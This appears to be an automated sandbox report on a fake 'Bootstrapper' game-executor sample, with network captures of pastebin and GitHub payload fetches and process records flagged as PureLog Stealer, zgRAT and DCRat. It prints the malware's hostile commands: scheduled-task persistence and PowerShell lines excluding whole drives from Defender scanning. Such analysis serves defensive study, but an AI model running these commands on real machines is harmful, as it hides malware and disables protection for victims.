2024-09-14 10:52:05 UTC	831	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 10:52:05 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"e1d895c526c3cd0cc3c6c0e3e7022f52" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Qeej%2FznuhvEcwVRNoiCYDHjn9k8udi6W607vKgvuMrNDjeF%2FiM5cL4VoNODDsK70zwvg3bUns5RiDlyfYOAEhrQBFkDykuGb1CyP9dBzil8Va1ooqSjZ%2FsdSKXrl8jD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8c2fd358eebb4285-EWR alt-svc: h3=":443"; ma=86400
2024-09-14 10:52:05 UTC	109	IN	Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 78 52 43 61 43 37 63 64 42 6e 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a Data Ascii: 67{ "args" : { "code" : "xRCaC7cdBn" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
2024-09-14 10:52:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.20.3.235	443	7152	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-14 10:52:08 UTC	168	OUT	GET /raw/pjseRvyK HTTP/1.1 Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/ Host: pastebin.com Connection: Keep-Alive
2024-09-14 10:52:08 UTC	397	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 10:52:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 793 Last-Modified: Sat, 14 Sep 2024 10:38:55 GMT Server: cloudflare CF-RAY: 8c2fd369fdbf4270-EWR
2024-09-14 10:52:08 UTC	646	IN	Data Raw: 32 37 66 0d 0a 7b 0d 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 31 39 22 2c 0d 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 34 33 61 64 31 38 35 33 61 64 39 31 34 32 37 64 22 2c 0d 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 31 32 22 2c 0d 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 79 70 65 73 68 69 31 32 2f 65 6e 64 2f 72 65 6c 65 61 73 65 73 2f 64 6f 77 6e 6c 6f 61 64 2f 72 65 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0d 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 Data Ascii: 27f{ "BootstrapperVersion": "1.19", "SupportedClient": "version-43ad1853ad91427d", "SoftwareVersion": "3.112", "BootstrapperUrl": "https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe", "SoftwareUrl":"https://g
2024-09-14 10:52:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	128.116.123.4	443	7152	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-14 10:52:09 UTC	213	OUT	GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/ Host: clientsettings.roblox.com Connection: Keep-Alive
2024-09-14 10:52:10 UTC	576	IN	HTTP/1.1 200 OK content-length: 119 content-type: application/json; charset=utf-8 date: Sat, 14 Sep 2024 10:52:09 GMT server: Kestrel cache-control: no-cache strict-transport-security: max-age=3600 x-frame-options: SAMEORIGIN roblox-machine-id: c0893d27-7be0-f1d5-aa53-d7db1f83ae0e x-roblox-region: us-central_rbx x-roblox-edge: fra2 report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1} connection: close
2024-09-14 10:52:10 UTC	119	IN	Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 34 32 2e 30 2e 36 34 32 30 36 33 36 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 34 33 61 64 31 38 35 33 61 64 39 31 34 32 37 64 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 34 32 30 36 33 36 22 7d Data Ascii: {"version":"0.642.0.6420636","clientVersionUpload":"version-43ad1853ad91427d","bootstrapperVersion":"1, 6, 0, 6420636"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.20.23.46	443	7152	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-14 10:52:12 UTC	193	OUT	GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1 Cookie: __cf_mw_byp=qZqnGzIzOXTxVPo3czOG7_l2i0C5zE2rYzhsww46jsY-1726311125-0.0.1.1-/; path=/ Host: www.nodejs.org Connection: Keep-Alive
2024-09-14 10:52:12 UTC	497	IN	HTTP/1.1 307 Temporary Redirect Date: Sat, 14 Sep 2024 10:52:12 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: close Cache-Control: public, max-age=0, must-revalidate location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi strict-transport-security: max-age=31536000; includeSubDomains; preload x-vercel-id: iad1::8gf89-1726311132489-44c62f5fb636 CF-Cache-Status: DYNAMIC X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8c2fd381df0772a7-EWR
2024-09-14 10:52:12 UTC	20	IN	Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a Data Ascii: fRedirecting...
2024-09-14 10:52:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:52:01
Start date:	14/09/2024
Path:	C:\Users\user\Desktop\BootstrapperV1.19.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BootstrapperV1.19.exe"
Imagebase:	0x400000
File size:	3'247'616 bytes
MD5 hash:	C9D720A4200DF5064F655ADC3656056F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:52:01
Start date:	14/09/2024
Path:	C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe"
Imagebase:	0x158ac680000
File size:	995'840 bytes
MD5 hash:	90FD25CED85FE6DB28D21AE7D1F02E2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:52:01
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:52:01
Start date:	14/09/2024
Path:	C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe"
Imagebase:	0xd20000
File size:	2'241'785 bytes
MD5 hash:	B444FEC863C995EC2C4810FC308F08C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:52:02
Start date:	14/09/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"
Imagebase:	0x410000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:52:12
Start date:	14/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180
Imagebase:	0x7ff754b30000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:52:31
Start date:	14/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:52:31
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:52:31
Start date:	14/09/2024
Path:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"
Imagebase:	0xe00000
File size:	1'920'000 bytes
MD5 hash:	3C3B7D5864E9F151A77B33D4B9D15E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security
Antivirus matches:	Detection: 58%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:52:33
Start date:	14/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:52:34
Start date:	14/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:52:34
Start date:	14/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff71e800000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	60
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
